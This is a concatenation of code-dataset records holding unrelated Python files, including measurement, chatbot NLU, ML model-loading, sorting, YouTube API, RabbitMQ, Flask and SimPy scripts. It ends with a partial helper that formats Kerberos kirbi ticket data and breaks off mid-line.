ser.read_until().decode(\"utf-8\")\n\n# command = \"MEASure:RESistance?\"\ncommand = \":MEAS:VOLT:DC?\"\n\nser.write(command.encode(\"utf-8\"))\nser.write(\"\\n\".encode(\"utf-8\"))\nret = ser.read_until().decode(\"utf-8\")\n\nprint(\"return value: \", 
ret)\n\nser.close()","repo_name":"breathewind/Measurement-UI","sub_path":"MeasurementUI/Scripts/Check_connection.py","file_name":"Check_connection.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31161434760","text":"import logging\nimport random\nimport re\n\nfrom chirpy.core.response_generator import Treelet\nfrom chirpy.core.response_priority import ResponsePriority\nfrom chirpy.core.response_generator_datatypes import ResponseGeneratorResult, PromptResult, PromptType\nfrom chirpy.core.entity_linker.entity_groups import ENTITY_GROUPS_FOR_EXPECTED_TYPE\nfrom chirpy.core.regex.response_lists import RESPONSE_TO_THATS, RESPONSE_TO_DIDNT_KNOW\nfrom chirpy.response_generators.music.regex_templates.name_favorite_song_template import NameFavoriteSongTemplate\nfrom chirpy.response_generators.music.utils import WikiEntityInterface\nfrom chirpy.response_generators.wiki2.wiki_utils import get_til_title\nimport chirpy.response_generators.music.response_templates.general_templates as templates\nfrom chirpy.response_generators.music.state import ConditionalState\nfrom chirpy.response_generators.music.music_helpers import ResponseType\n\ndef nlu_processing(rg, state, utterance, response_types):\n    flags = {\n        'song_ent_exists': False,\n        'dont_know': False,\n        'no_fav_song': False,\n        'tils_exist': False,\n        'metadata_exists': False\n    }\n\n    cur_singer_str = None\n    cur_song_str = None\n    cur_song_ent = None\n    # if cur_song_str is not None:\n    #     conditional_state.cur_song_str = cur_song_str\n    # if cur_song_ent is not None:\n    #     conditional_state.cur_song_ent = cur_song_ent\n    # if cur_singer_str is not None:\n\n    cur_song_ent, cur_singer_ent = rg.get_song_and_singer_entity()\n    if cur_song_ent:\n        flags['song_ent_exists'] = True\n        cur_song_str = cur_song_ent.talkable_name\n        cur_song_str = re.sub(r'\\(.*?\\)', '', cur_song_str)\n        tils = get_til_title(cur_song_ent.name)\n        if len(tils):\n            flags['tils_exist'] = True\n        else:\n            metadata = rg.get_song_meta(cur_song_str, cur_singer_ent.talkable_name if cur_singer_ent else None)\n            if metadata:\n                flags['metadata_exists'] = True\n                cur_singer_str = metadata['artist']\n    elif ResponseType.DONT_KNOW in response_types:\n        flags['dont_know'] = True\n    elif ResponseType.NO in response_types or ResponseType.NOTHING in response_types:\n        flags['no_fav_song'] = True\n    elif cur_singer_ent is None:\n        song_slots = NameFavoriteSongTemplate().execute(utterance)\n        if song_slots is not None and 'favorite' in song_slots:\n            cur_song_str = song_slots['favorite']\n            cur_song_ent = rg.get_song_entity(cur_song_str)\n\n            if cur_song_ent:\n                tils = get_til_title(cur_song_ent.name)\n                if len(tils):\n                    flags['tils_exist'] = True\n\n            metadata = rg.get_song_meta(cur_song_str, None)\n            if metadata:\n                flags['metadata_exists'] = True\n                cur_singer_str = metadata['artist']\n\n    if cur_song_str is not None:\n        state.cur_song_str = cur_song_str\n    if cur_song_ent is not None:\n        state.cur_song_ent = cur_song_ent\n    if cur_singer_str is not None:\n        state.cur_singer_str = cur_singer_str\n\n    return flags\n\ndef prompt_nlu_processing(rg, state, utterance, response_types):\n    flags = {\n        'tils_exist': False,\n        'cur_song_ent_exists': False,\n        'metadata_exists': False\n    }\n\n    cur_song_ent, cur_singer_ent = rg.get_song_and_singer_entity()\n    if cur_song_ent:\n        cur_song_str = cur_song_ent.talkable_name\n        cur_song_str = re.sub(r'\\(.*?\\)', '', cur_song_str)\n        flags['cur_song_ent_exists'] = True\n        cur_singer_str = None\n        if cur_singer_ent:\n            cur_singer_str = cur_singer_ent.talkable_name\n            cur_singer_str = re.sub(r'\\(.*?\\)', '', cur_singer_str)\n\n        tils = get_til_title(cur_song_ent.name)\n        if len(tils):\n            flags['tils_exist'] = True\n        else:\n            metadata = rg.get_song_meta(cur_song_str, cur_singer_str)\n            if metadata:\n                flags['metadata_exists'] = True\n                cur_singer_str = metadata['artist'] \n\n    if cur_song_str is not None:\n        state.cur_song_str = cur_song_str\n    if cur_song_ent is not None:\n        state.cur_song_ent = cur_song_ent\n    if cur_singer_str is not None:\n        state.cur_singer_str = cur_singer_str\n\n    return flags\n\n\n\n\n\n\n\n\n\n","repo_name":"shashank2000/chirpy_lambda","sub_path":"package/chirpy/response_generators/music/yaml_files/supernodes/music_get_song/nlu.py","file_name":"nlu.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13265943514","text":"import torch\nimport models.cifar as models\nimport torch.optim as optim\nfrom ms_net_utils import *\nfrom data_utils import *\n\n\ndef load_teacher_network():\n    \"\"\" return the best teacher network with state_dict. \"\"\"\n\n    teacher = models.__dict__['resnext'](\n                    cardinality=8,\n                    num_classes=10,\n                    depth=29,\n                    widen_factor=4,\n                    dropRate=0,\n                )\n    teacher = torch.nn.DataParallel(teacher).cuda()\n    checkpoint = torch.load(\"./ck_backup/teachers/resnext_best.pth.tar\")\n    teacher.load_state_dict(checkpoint['state_dict'])\n    return teacher\n\n\ndef load_expert_networks_and_optimizers(lois, \n                                        num_classes, \n                                        dataset, \n                                        arch, \n                                        depth, \n                                        block_name,\n                                        initialize_with_router=True,\n                                        finetune_experts=True\n                                        ):\n    experts = {}\n    eoptimizers = {}\n    chk = torch.load('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n    for loi in lois:\n        experts[loi] = models.__dict__[arch](\n                    num_classes=num_classes,\n                    depth=depth,\n                    block_name=block_name)\n        \n        experts[loi] = experts[loi].cuda()\n        \n        initialize_with_router = True\n        if (initialize_with_router):\n            experts[loi].load_state_dict(chk['state_dict'])\n\n        finetune_experts = True\n        if (finetune_experts):\n            eoptimizers[loi] = optim.SGD([{'params': experts[loi].layer1.parameters(), 'lr': 0.0},\n                                          {'params': experts[loi].layer2.parameters(), 'lr': 0.0},\n                                          {'params': experts[loi].layer3.parameters(), 'lr': 0.01},\n                                          {'params': experts[loi].fc.parameters()}],\n                                          lr=0.01, momentum=0.9, weight_decay=5e-4)\n            \n        else:\n            eoptimizers[loi] = optim.SGD(experts[loi].parameters(), lr=0.1, momentum=0.9,\n                              weight_decay=5e-4)\n    \n    \n    return experts, eoptimizers\n\n\n\ndef make_router_and_optimizer(num_classes,\n                              dataset,\n                              arch,\n                              depth,\n                              block_name,\n                              learning_rate,\n                              load_weights=False):\n    model = models.__dict__[arch](\n        num_classes=num_classes,\n        depth=depth,\n        block_name=block_name)\n    if (load_weights):\n        #model = torch.nn.DataParallel(model).cuda()\n        model = model.cuda()\n        print ('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n        chk = torch.load('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n        model.load_state_dict(chk['state_dict'])\n    \n    optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9,\n                          weight_decay=5e-4)\n    return model, optimizer\n","repo_name":"IamYourAlpha/Expert-Aware-Router-EAR","sub_path":"model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28276164926","text":"'''\r\n\r\nGiven an integer array nums and an integer k, return true if there are two distinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,2,3,1], k = 3\r\nOutput: true\r\nExample 2:\r\n\r\nInput: nums = [1,0,1,1], k = 1\r\nOutput: true\r\nExample 3:\r\n\r\nInput: nums = [1,2,3,1,2,3], k = 2\r\nOutput: false\r\n \r\n\r\n\r\n\r\n'''\r\n\r\n\r\n\r\nclass Solution(object):\r\n def containsNearbyDuplicate(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: bool\r\n \"\"\"\r\n \r\n\r\n cache_dict = {}\r\n for idx in range(len(nums)):\r\n if nums[idx] in cache_dict and abs(idx - cache_dict[nums[idx]]) <= k:\r\n return True\r\n cache_dict[nums[idx]] = idx\r\n return False\r\n\r\n\r\n ","repo_name":"nilesh23041999/DSA-Daily","sub_path":"leetcode_219_duplicate_2.py","file_name":"leetcode_219_duplicate_2.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37937864937","text":"def readPGM(file):\n _ = file.readline()\n wh = file.readline()\n if str(wh).find('#') != -1:\n wh = file.readline()\n (width, height) = [int(i) for i in wh.split()]\n depth = int(file.readline())\n image = []\n for y in range(height):\n row = []\n for y in range(width):\n row.append(ord(file.read(1)))\n image.append(row)\n file.close()\n return depth, image\n\ndef writePGM(file, w, h, depth, flatImg):\n file.write('P5\\n'.encode())\n file.write('{} {}\\n'.format(w, h).encode())\n file.write('{}\\n'.format(depth).encode())\n file.write(bytearray(flatImg))\n file.close()\n","repo_name":"Akaifox16/DIP_HW1","sub_path":"pgmf.py","file_name":"pgmf.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2713323580","text":"import random\nimport time\n\ndef selection_sort(list_s):\n comparison = 0\n for i in range(len(list_s)-1):\n minimum = list_s[i]\n min_index = i\n j = i + 1\n while j < len(list_s):\n if list_s[j] < minimum:\n minimum = list_s[j]\n min_index = j\n comparison += 1\n j += 1\n temp = list_s[i]\n list_s[i] = minimum\n list_s[min_index] = temp\n return comparison\n \ndef insertion_sort(list_i):\n comparison = 0\n for static in range(1,len(list_i)):\n moving = static \n while list_i[moving] < list_i[moving-1] and moving > 0:\n temp = list_i[moving]\n list_i[moving] = list_i[moving-1]\n list_i[moving-1] = temp\n moving -= 1\n comparison += 1\n if moving > 0:\n comparison +=1\n return comparison\n\n \n\ndef main():\n # Give the random number generator a seed, so the same sequence of \n # random numbers is generated at each run\n random.seed(1234) \n \n # Generate 5000 random numbers from 0 to 999,999\n randoms = random.sample(range(1000000), 1000)\n start_time = time.time() \n comps = selection_sort(randoms)\n stop_time = time.time()\n print(comps, stop_time - start_time)\n\nif __name__ == '__main__': \n main()\n\n","repo_name":"JonathanShan/Sorts","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32385844709","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport argparse\r\nimport traceback\r\nimport sys\r\n\r\nfrom services import api_request\r\nfrom services import output\r\n\r\ndef get_args():\r\n 
#argparseを使ったコマンドライン引数の取得\r\n parser = argparse.ArgumentParser(description='YouTube Api')\r\n parser.add_argument('--api_key', dest='api_key', type=str, help='Youtube Data Api Key', required=True)\r\n parser.add_argument('-o', '--output', dest='output', type=str, help='OUT PUT')\r\n\r\n # function 使用する関数\r\n subparsers = parser.add_subparsers()\r\n\r\n # channel\r\n get_channel_parser = subparsers.add_parser('channel', help='Get Youtube Channel Data')\r\n get_channel_parser.add_argument('channel_id', help='Channel Id') # チャンネルID\r\n get_channel_parser.set_defaults(func=api_request.channel) # 実行する関数設定\r\n\r\n # videos\r\n get_channel_parser = subparsers.add_parser('videos', help='Get Youtube Videos Data')\r\n get_channel_parser.add_argument('q', help='serch words') # チャンネルID\r\n get_channel_parser.set_defaults(func=api_request.videos) # 実行する関数設定\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef main():\r\n # コマンドライン引数の取得\r\n args = get_args()\r\n\r\n #アプリケーション内部の実装\r\n try:\r\n res = args.func(args)\r\n\r\n if args.output is not None:\r\n output.file(res, args.output)\r\n print(args.output + 'に保存されました')\r\n\r\n #終了ステータスの定義\r\n print(res)\r\n\r\n #エラーの出力\r\n except :\r\n print('#' * 5 + 'エラーが発生して処理を中断しました' + '#' * 5)\r\n print(traceback.format_exc(sys.exc_info()[2]))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bacle-nuage/youtube_data_api","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38541059709","text":"class TempDatas(object):\n '''全局变量'''\n def __init__(self):\n #\n self.iStatus = 2 # 炉位状态 0 正常检测 1 断头 2 暂停 \n self.pauseTimes = 0\n self.runflag = False # 是否开始检测\n self.grayFrame = None\n self.rgbFrame = None\n self.captured = False\n self.isDead = False\n self.condition = 0\n self.pageCondition = 0\n self.perviewflag = False\n self.firstFrame = None\n #学习和识别\n self.startflag = True\n self.machineStart = False\n self.index = 0\n self.avgValues = [0,0,0,0,0,0]\n self.spiltPerValues = [0,0,0,0,0,0]\n self.condition = 0\n self.normalNum = 0\n #检测数据\n self.detectNum = 0\n self.errorTimes = 0\n self.errortype = 0\n self.loubanfenbu = [0,0,0,0,0,0]\n self.senderrorCount = 0\n self.SendErrorList = []\n self.startShangtou = 0 \n self.endShangtou = 0\n self.timeShangtou = 0\n self.shangtouSucess = 0\n self.ShangtouSucessTime = 0\n #漏板从左到右,六个区域\n self.leftleft = 0\n self.leftright = 0\n self.midleft = 0\n self.midright = 0\n self.rightleft = 0\n self.rightright = 0\n self.interval = 0","repo_name":"Mittenss2010/FiberWinding","sub_path":"button_SaveImage_version/scripts/TempDatas.py","file_name":"TempDatas.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19874681648","text":"#Advent of Code 2022: Day 18\nfrom datetime import datetime\nfrom collections import deque\nstart = datetime.now()\ndef create_cubes(lines):\n cubes = set()\n for line in lines:\n cube = tuple(map(int,line.split(\",\")))\n cubes.add(cube)\n return cubes\n \ndef create_directions():\n directions = []\n all_directions = set([(x, y, z) for x in range(-1,2) for y in range(-1, 2) for z in range(-1,2)])\n for direction in all_directions:\n if manhDistance(direction, (0,0,0)) == 1:\n directions.append(direction)\n return directions\n \ndef tuple_sum(a,b):\n return tuple([x + y for x, y in zip(a,b)])\n \ndef manhDistance(a, b):\n return sum(abs(val1-val2) for 
val1, val2 in zip(a,b))\n \ndef check_neighbour(cube):\n open_sides = 6\n for direction in directions:\n neighbour = tuple_sum(direction, cube)\n if neighbour in cubes:\n open_sides -= 1\n return open_sides\n \ndef check_sides(cubes):\n counter = 0\n for cube in cubes:\n open_sides = check_neighbour(cube)\n counter += open_sides\n return counter\n \ndef count_surface(water_surface):\n counter = 0\n for cube in cubes:\n for direction in directions:\n if tuple_sum(direction, cube) in water_surface:\n counter += 1\n return counter\n \n#MAIN\nwith open(\"data.txt\") as file:\n lines = file.read().splitlines()\ncubes = create_cubes(lines)\ndirections = create_directions()\n \n#Cuve 3x3x3 with mid segment+one corner missing\n#cubes = set((x,y,z) for x in range(2,5) for y in range(2,5) for z in range(2,5))\n#cubes.remove((3,3,3))\n#cubes.remove((2,2,2))\n \n#Task1:\ntask1 = check_sides(cubes)\nprint(\"Task 1:\", task1)\nprint(\"Runtime:\", datetime.now()-start)\n \n#Task2\nmax_size = 24\nall_cubes = set((x,y,z) for x in range(-1, max_size+1) for y in range(-1, max_size+1) for z in range(-1,max_size+1))\nstart_cube = (1,1,1)\nqueue = deque([start_cube])\nwater_surface = set()\nwhile queue:\n current_cube = queue[0]\n for direction in directions:\n neighbour = tuple_sum(direction, current_cube)\n if neighbour in all_cubes and neighbour not in cubes:\n #if check_neighbour(neighbour) <= 5:\n water_surface.add(neighbour)\n queue.append(neighbour)\n all_cubes.remove(neighbour)\n queue.popleft()\n \n# size = 6\n# for z in range(0,size):\n# print(\"Layer:\",z)\n# for y in range(0,size):\n# for x in range(0,size):\n# if (x,y,z) in cubes:\n# print(\"#\", end=\"\")\n# elif (x,y,z) in water_surface:\n# print(\".\", end=\"\")\n# else:\n# print(\" \", end=\"\")\n# print(\" \")\n# print(\" \")\n \nprint(count_surface(water_surface))","repo_name":"trohat/AdventOfCode2022","sub_path":"D18/d18-los.py","file_name":"d18-los.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"81277043","text":"from flask import Flask, render_template, request\n\n\nfrom kantei_main import kantei_uma\nfrom kantei_main import kantei_kisyu\n\n\n\n#配列をグローバル変数と指定\n#uma\n#kisyu\n\nglobal uma\nglobal kisyu\nglobal kusei_nen\nglobal kusei_tuki\nglobal kusei_hi\n\n\n\n\numa = []\nkisyu = []\n\nkusei_nen = \"\"\nkusei_tuki = \"\"\nkusei_hi = \"\"\n\ndata_kusei = []\n\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/kakusu_select\", methods=['GET', 'POST'])\n\n#index.htmlからの遷移\ndef kakusu_select():\n if request.method == 'POST':\n # POSTデータを取得\n user_data = request.form\n kusei_nen = request.form.get('kusei_nen')\n kusei_tuki = request.form.get('kusei_tuki') \n kusei_hi = request.form.get('kusei_hi')\n seletc_form_id = request.form.get('select_form_id')\n \n data_kusei.append(kusei_nen)\n data_kusei.append(kusei_tuki)\n data_kusei.append(kusei_hi)\n\n \n\n if seletc_form_id == \"kisyu\":\n return render_template(\"kisyu_form.html\",data_kusei = data_kusei)\n elif seletc_form_id == \"uma\":\n return render_template(\"uma_form.html\",data_kusei = data_kusei)\n else:\n return render_template(\"no-kakusu.html\")\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/kisyu_form\", methods=['GET', 'POST'])\ndef kisyu_form():\n\n if request.method == 'POST':\n # POSTデータを取得\n #uma = request.form.getlist('uma') \n kusei_nen = request.form.get('kusei_nen')\n kusei_tuki = 
request.form.get('kusei_tuki')\n        kusei_hi = request.form.get('kusei_hi')\n\n        \n        kisyu = []\n        for i in range(1, 19):\n            kisyu.append(request.form['kisyu' + str(i)])\n\n\n        kotae = kantei_kisyu(kisyu,kusei_nen,kusei_tuki,kusei_hi)\n        \n    if kotae[0] == \"errer\":\n        return render_template(\"errer.html\",kotae = kotae)\n    elif kotae[0] != \"errer\":\n        return render_template(\"kisyu_kantei.html\",kotae = kotae)\n    else:\n        return render_template(\"no-kakusu.html\")\n\n\n@app.route(\"/uma_form\", methods=['GET', 'POST'])\ndef uma_form():\n    if request.method == 'POST':\n        # POSTデータを取得\n        kusei_nen = request.form.get('kusei_nen')\n        kusei_tuki = request.form.get('kusei_tuki')\n        kusei_hi = request.form.get('kusei_hi')\n\n        \n        uma = []\n        for i in range(1, 19):\n            uma.append(request.form['uma' + str(i)]) \n        \n        kotae = kantei_uma(uma,kusei_nen,kusei_tuki,kusei_hi)\n        \n        \n    if kotae[0] == \"errer\":\n        return render_template(\"errer.html\",kotae = kotae)\n    elif kotae[0] != \"errer\":\n        return render_template(\"uma_kantei.html\",kotae = kotae)\n    else:\n        return render_template(\"no-kakusu.html\") \n\n@app.route(\"/about\")\ndef about():\n    return render_template(\"about.html\")\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"miracle777/uma_kisyu_aisyo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4211048376","text":"import sys\n\nmy_list = [1, 1, 2, 2, 3, 3, 4, 4, 5, 5] # Fill this list to test the implementations!\n\ndef sum_A(l):\n    prev = sys.maxsize\n    s = 0\n    for i in range(len(l)):\n        if (l[i] < prev):\n            prev = l[i]\n            s += l[i]\n    return s\n\n\ndef sum_B(l):\n    prev = sys.maxsize\n    s = 0\n    for i in range(len(l)):\n        if (l[i] < prev):\n            prev = l[i]\n            s += l[i]\n    return sum(l)\n    \n\ndef sum_C(l):\n    prev = sys.maxsize\n    s = 0\n    for i in range(len(l)):\n        if (l[i] < prev):\n            prev = l[i]\n        s += l[i]\n    return s\n\n\ndef sum_D(l):\n    s = 0\n    for i in range(len(l)):\n        if (l[i] > 0):\n            s += l[i]\n    return s\n\n\ndef sum_E(l):\n    s = 0\n    if len(l) == 0:\n        return -1\n    for i in range(len(l)):\n        s += l[i]\n    return s\n\n\nprint(\"Implementation A\", sum_A(my_list))\nprint(\"Implementation B\", sum_B(my_list))\nprint(\"Implementation C\", sum_C(my_list))\nprint(\"Implementation D\", sum_D(my_list))\nprint(\"Implementation E\", sum_E(my_list))","repo_name":"iPwnds/Python","sub_path":"TU Delft/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74336313446","text":"import simpy\nenv=simpy.Environment()\n\ndef driver(env, car):\n    yield env.timeout(3)\n    car.action.interrupt()\nclass Car(object):\n    def __init__(self,env) -> None:\n        self.env=env\n\n        self.action=env.process(self.run())\n\n    def run(self):\n\n        while True:\n            print('Start parking and charging at ', self.env.now)\n            try:\n                yield self.env.process(self.charge(5))\n            except simpy.Interrupt:\n                print('Battery is full enough')\n            \n            print('start driving', self.env.now)\n            yield self.env.timeout(2)\n\n    def charge(self, duration):\n        \n        yield self.env.timeout(duration)\n\ncar=Car(env)\nenv.process(driver(env, car))\nenv.run(until=15)\n","repo_name":"dineshbodala/simpy-simulations","sub_path":"carcharging(interruption).py","file_name":"carcharging(interruption).py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71259112487","text":"import logging\nimport time\nimport json\nimport asyncio\nfrom constants import *\nfrom rabbitmq_async_client import rabbitmq_async_client\n\nlogging.basicConfig(level = logging.INFO)\n\nasync def main() -> None:\n\n    # Read messages from file\n    with open(MESSAGES_FILE_PATH, 'r') as f:\n        messages_dict = json.load(f)\n\n    # Sleep for 20 seconds to allow RabbitMQ to come up\n    logging.info('Sleeping for 20 seconds to allow RabbitMQ to come up')\n    time.sleep(20)\n\n    rabbitmq_client = rabbitmq_async_client(RABBIT_MQ_URL)\n\n    # Create TEST_QUEUE\n    await rabbitmq_client.create_queue(TEST_QUEUE) \n\n    # Publish messages to TEST_QUEUE\n    try: \n        await asyncio.gather(*[rabbitmq_client.publish_message(TEST_QUEUE, message) for message in messages_dict])\n    except Exception as e:\n        logging.error('Error publishing message: {}'.format(str(e)))\n\n    await rabbitmq_client.close()\n\nif __name__ == \"__main__\":\n    asyncio.run(main())","repo_name":"Zachery2008/rabbitmq-python-client-docker-example","sub_path":"src/publisher_async.py","file_name":"publisher_async.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39752931611","text":"import json\nimport numpy as np\n\n\n\n\n\ndef get_json_params(file_path):\n    params = []\n    with open(file_path, 'r') as f:\n        params = json.load(f)\n    return params\n\ndef get_txt_params(file_path, splitStr=' '):\n    params = []\n    with open(file_path,'r') as f:\n        for line in f:\n            params.append(list(line.strip().split(splitStr)))\n    return params\n\ndef get_label_map_palette(label_map_path):\n    labels = get_json_params(label_map_path)\n    palette = np.array([[0, 0, 0] for i in range(256)]).astype(np.uint8)\n    for label in labels:\n        palette[label['id'], 0] = label['vis']['r']\n        palette[label['id'], 1] = label['vis']['g']\n        palette[label['id'], 2] = label['vis']['b']\n    return palette","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/utils/param_file_access.py","file_name":"param_file_access.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7120399102","text":"\"\"\"Prunes model weights to keep just the necessary trained weights.\n\nExample usage:\n    python scripts/prune_model_ckpt.py runs/gill_exp\n\"\"\"\n\nimport json\nimport os\nimport sys\nimport torch\n\n\nif __name__ == '__main__':\n    model_dir = sys.argv[1]\n\n    with open(os.path.join(model_dir, 'ckpt_best.pth.tar'), 'rb') as f:\n        checkpoint = torch.load(f)\n\n    with open(os.path.join(model_dir, 'model_args.json'), 'rb') as f:\n        model_args = json.load(f)\n\n    del checkpoint['epoch']\n    del checkpoint['best_acc1']\n    del checkpoint['optimizer']\n    del checkpoint['scheduler']\n\n    state_dict = {}\n    for k, v in checkpoint['state_dict'].items():\n        state_dict[k.replace('module.', '')] = v.detach().clone()\n\n    checkpoint['state_dict'] = state_dict\n    finetuned_tokens = checkpoint['state_dict']['model.input_embeddings.weight'][-model_args['num_tokens']:, :].detach().clone()\n    checkpoint['state_dict']['model.input_embeddings.weight'] = finetuned_tokens\n\n    with open(os.path.join(model_dir, 
'pretrained_ckpt.pth.tar'), 'wb') as f:\n torch.save(checkpoint, f)","repo_name":"kohjingyu/gill","sub_path":"scripts/prune_model_ckpt.py","file_name":"prune_model_ckpt.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"53"} +{"seq_id":"39818411552","text":"# coding=utf-8\r\nfrom moviepy.editor import *\r\nfrom sys import argv\r\nimport os\r\nimport shutil\r\nimport uuid\r\nfrom props import readprops\r\n\r\n# 参数设置\r\nprops = readprops('gif.props')\r\nprint(props)\r\n\r\nmsg = '关注公众号 ttimeinv'\r\ncolor = 'red'\r\nfontsize = 30\r\n\r\nif '话术' in props:\r\n msg = props['话术']\r\nif '字体颜色' in props:\r\n color = props['字体颜色']\r\nif '字体大小' in props:\r\n fontsize = int(props['字体大小'])\r\n\r\ntxt_clip = TextClip(msg,fontsize=fontsize,color=color,font='msyh.ttf')\r\nfw,fh = txt_clip.size\r\n\r\nprint('读取gif')\r\nif not os.path.exists('gif'):\r\n print('gif文件夹不存在')\r\n exit(0)\r\n\r\nprint('清理dist')\r\nif os.path.exists('dist'):\r\n shutil.rmtree('dist')\r\nos.mkdir('dist')\r\n\r\nindex = -1\r\nfor file in os.listdir('gif'):\r\n if file.find('.') == 0:\r\n print('pass hidden file %s' % file)\r\n continue\r\n videoclip = VideoFileClip(os.path.join('gif',file))\r\n w,h = videoclip.size\r\n if fw > w or fh > h:\r\n print('字体太大 或 文字太长 放弃处理:%s' % file)\r\n continue\r\n index += 1\r\n print('开始处理第%d个:%s' % (index+1,file))\r\n os.mkdir(os.path.join('dist', str(index)))\r\n unit = (w-fw) / 9\r\n for i in range(9 + 1):\r\n txt_clip = txt_clip.set_position((i*unit,'bottom')).set_start(0).set_duration(videoclip.duration)\r\n video = CompositeVideoClip([videoclip, txt_clip])\r\n video.write_gif(os.path.join('dist', str(index), str(uuid.uuid4()) + '.gif'), fps=8, verbose=False)\r\n","repo_name":"laizhenhai88/pil","sub_path":"gif.py","file_name":"gif.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4931801547","text":"#!/usr/bin/env python\nfrom distutils.core import setup\nfrom setuptools import find_packages\nimport sys, os\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.md')).read()\n\nversion = '0.1.0'\n\ninstall_requires = open(os.path.join(here,\"requirements.txt\")).readline()\n\nsetup(name='lobo2',\n version=version,\n description=\"SUNET datasets\",\n long_description=README,\n classifiers=[\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n ],\n keywords='sunet datasets torrent',\n author='Leif Johansson',\n author_email='leifj@sunet.se',\n url='http://blogs.mnt.se',\n license='BSD',\n setup_requires=['nose>=1.0'],\n tests_require=['nose>=1.0', 'mock', 'jinja2', 'mockredispy'],\n test_suite=\"nose.collector\",\n packages=find_packages('src'),\n package_dir={'': 'src'},\n include_package_data=True,\n package_data={\n 'lobo2': ['templates/*.html',\n 'static/*',\n 'static/**/*'],\n },\n zip_safe=False,\n install_requires=install_requires,\n message_extractors={'src': [\n ('**.py', 'python', None),\n ('**/templates/**.html', 'jinja2', None),\n ]},\n)\n","repo_name":"SUNET/lobo2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20123781032","text":"\n\nfrom minikerberos.protocol.asn1_structs import KRB_CRED, EncKrbCredPart, KRBCRED\nimport base64\n\ndef format_kirbi(data, n = 100):\n\tkd = 
base64.b64encode(data).decode()\n\treturn ' ' + '\\r\\n '.join([kd[i:i+n] for i in range(0, len(kd), n)])\n\ndef describe_kirbi_data(data):\n\tif isinstance(data, bytes):\n\t\tkirbi = KRB_CRED.load(data).native\n\telif isinstance(data, dict):\n\t\tkirbi = data\n\telif isinstance(data, KRB_CRED):\n\t\tkirbi = data.native\n\telif isinstance(data, KRBCRED):\n\t\tkirbi = data.native\n\telse:\n\t\traise Exception('Unknown data type! %s' % type(data))\n\t\n\tt = '\\r\\n'\n\tfor ticket in kirbi['tickets']:\n\t\tt += 'Realm : %s\\r\\n' % ticket['realm']\n\t\tt += 'Sname : %s\\r\\n' % '/'.join(ticket['sname']['name-string'])\n\n\tif kirbi['enc-part']['etype'] == 0:\n\t\tcred = EncKrbCredPart.load(kirbi['enc-part']['cipher']).native\n\t\tcred = cred['ticket-info'][0]\n\t\tusername = cred.get('pname')\n\t\tif username is not None:\n\t\t\tusername = '/'.join(username['name-string'])\n\t\tflags = cred.get('flags')\n\t\tif flags is not None:\n\t\t\tflags = ', '.join(flags)\n\n\t\tt += 'UserName : 